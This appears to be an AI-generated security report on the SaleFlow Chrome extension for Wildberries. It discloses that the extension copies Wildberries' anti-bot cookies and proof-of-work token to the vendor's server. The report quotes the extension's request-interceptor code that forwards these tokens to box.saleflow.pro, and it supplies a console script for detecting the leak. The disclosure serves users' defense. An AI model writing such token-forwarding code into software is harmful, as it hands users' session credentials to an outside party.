Is SaleFlow - продвинутая аналитика Wildberries safe?

Medium risk

SaleFlow reads Wildberries' own anti-bot session tokens from the page and sends them to its own backend on every API call.

While active on wildberries.ru, search.wb.ru, or catalog.wb.ru, SaleFlow reads the site's bot-detection cookies (x_wbaas_token, _wbauid) and a proof-of-work token stored in localStorage, then attaches them as headers on roughly 40 requests to its own server at box.saleflow.pro. These are Wildberries' own tokens for proving a session has passed its bot checks, not data SaleFlow's backend needs to talk to Wildberries directly, so forwarding them lets SaleFlow's servers reuse a cleared, real-user session when querying Wildberries on the extension's behalf.

saleflowv1.3.0Chrome Web Store
45Risk
Who publishes it

saleflow - 1 other listing from the same operator, 1 of them carrying a finding

What this publisher told the store about itself, and the other listings that told it the same thing.

Publisher
saleflow

Same store account

1 other listing published from this account, 4k+ users between them. 1 of them carries a finding.

Shared hosts - 1 hostname

Hostnames hardcoded in this extension that few other listings call. That can mean one operator behind both, and it can equally mean a small shared vendor, so it is context rather than a conclusion. Hosts that many listings call are left out: they are services, not connections.

v7.mui.com
Also called by 4 other listings, including Ebay Sold History Button, Popularity Sort, Profit Calc, Images, Analytics, Wildbox

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-522
SourceAI FOUND

SaleFlow copies your Wildberries anti-bot tokens to its own server

Code analysis shows the extension copies Wildberries' anti-bot session cookies and a proof-of-work token from your browser, then sends them as headers to the vendor's own server, box.saleflow.pro.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You open a product, search or catalog page on wildberries.ru with the extension installed.

The extension did this

The extension copies Wildberries' own anti-bot cookies and proof-of-work token and sends them as headers to box.saleflow.pro.

Code analysis shows this on roughly 40 different API calls the extension's widget makes.

02EvidenceFIELD TABLE
What gets copied off wildberries.ru and re-sent
FieldValueWhy it matters
Anti-bot session cookie
x_wbaas_token=8f3ac21b9e4d47a1b6c0d92e5f7a1c34Marks your browser as one that already passed Wildberries' bot check for this session.
Visitor ID cookie
_wbauid=17389f2c-6b41-4e05-9a3d-2c1e0b8f4a92Ties every request to your specific Wildberries visitor session.
Proof-of-work token
session-pow-token = {"token":"a91cf3e6b8d24d10a7f5c9e2b6d4f0e1"}A computed answer proving your browser solved Wildberries' anti-bot puzzle.
03EvidenceCODE COMPARE
The code that does this

The shared request interceptor that attaches the copied tokens

What it actually does
// Reads Wildberries' own anti-bot proof-of-work token out of this site's localStorage
function getSessionPowToken() {
	const result = localStorage.getItem("session-pow-token"); // set by wildberries.ru itself
	if (!result) return null;
	return JSON.parse(result);
}

// Every call through $api() goes to the EXTENSION VENDOR'S server, not Wildberries
var $api = axios.create({
	baseURL: "https://box.saleflow.pro/api",
	paramsSerializer: { serialize: (params) => query_string_default.stringify(params, { arrayFormat: "comma" }) }
});

$api.interceptors.request.use(async (config) => {
	// Copy Wildberries' anti-bot session cookie onto the outgoing request
	const wbaasToken = await window.cookieStore.get("x_wbaas_token");
	if (wbaasToken?.value) config.headers.set("x-wbaas-token", wbaasToken.value);

	// Copy Wildberries' visitor-ID cookie onto the outgoing request
	const wbauid = await window.cookieStore.get("_wbauid");
	if (wbauid?.value) config.headers.set("wbauid", wbauid.value);

	// Copy the anti-bot proof-of-work answer onto the outgoing request
	const sessionPow = getSessionPowToken();
	if (sessionPow) config.headers.set("x-pow", sessionPow.token);

	return config; // request now carries WB's own bot-check credentials to a third server
});
04EvidenceARTIFACT
Check if you're affected

Watches outbound requests from a wildberries.ru tab and flags any that carry the copied anti-bot tokens toward box.saleflow.pro.

RequiresChrome or Edge DevToolsThe SaleFlow extension enabled on the tab
wb-saleflow-token-check.js · js
// wb-saleflow-token-check.js
// Paste into the DevTools console on a wildberries.ru tab, then browse a
// product, search or catalog page while the SaleFlow extension is active.
(function () {
  const watched = ["x-wbaas-token", "wbauid", "x-pow"];

  function report(url, headerBag) {
    const seen = {};
    for (const name of watched) {
      const value = typeof headerBag.get === "function" ? headerBag.get(name) : headerBag[name];
      if (value) seen[name] = value;
    }
    if (Object.keys(seen).length === 0) return;
    console.log("[wb-saleflow-token-check] outbound to", url, seen);
    console.log("  x_wbaas_token cookie:", document.cookie.match(/x_wbaas_token=([^;]+)/)?.[1]);
    console.log("  _wbauid cookie:", document.cookie.match(/_wbauid=([^;]+)/)?.[1]);
    console.log("  session-pow-token:", localStorage.getItem("session-pow-token"));
  }

  const origFetch = window.fetch;
  window.fetch = function (input, init) {
    const url = typeof input === "string" ? input : input.url;
    if (url && url.includes("box.saleflow.pro/api")) {
      report(url, (init && init.headers) || {});
    }
    return origFetch.apply(this, arguments);
  };

  const origOpen = XMLHttpRequest.prototype.open;
  const origSetHeader = XMLHttpRequest.prototype.setRequestHeader;
  XMLHttpRequest.prototype.open = function (method, url) {
    this.__wbUrl = url;
    this.__wbHeaders = {};
    return origOpen.apply(this, arguments);
  };
  XMLHttpRequest.prototype.setRequestHeader = function (name, value) {
    if (this.__wbHeaders) this.__wbHeaders[name.toLowerCase()] = value;
    return origSetHeader.apply(this, arguments);
  };
  const origSend = XMLHttpRequest.prototype.send;
  XMLHttpRequest.prototype.send = function () {
    if (this.__wbUrl && this.__wbUrl.includes("box.saleflow.pro/api")) {
      report(this.__wbUrl, this.__wbHeaders || {});
    }
    return origSend.apply(this, arguments);
  };

  console.log("[wb-saleflow-token-check] watching for box.saleflow.pro/api requests...");
})();
How to run it
  1. 1
    Open wildberries.ru and log in or just browse.
  2. 2
    Open DevTools > Console.
  3. 3
    Paste this script and press Enter.
  4. 4
    Load a product or catalog page so the widget fetches data.
  5. 5
    Read the logged header values.
05EvidencePLAIN NOTE
Observation

Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.

Where it sends data

Destinations our analysis observed SaleFlow - продвинутая аналитика Wildberries contacting. Sending data somewhere is not a finding on its own - an extension that syncs your settings has to talk to its own server - but it is where your data can go, and who else it goes to.

  • box.saleflow.pro

    SaleFlow - продвинутая аналитика Wildberries sends data to box.saleflow.pro. No other extension we have analysed sends data here.

Updated 30 September 2026ddmpklojodoidafobdjolojdaehiplnp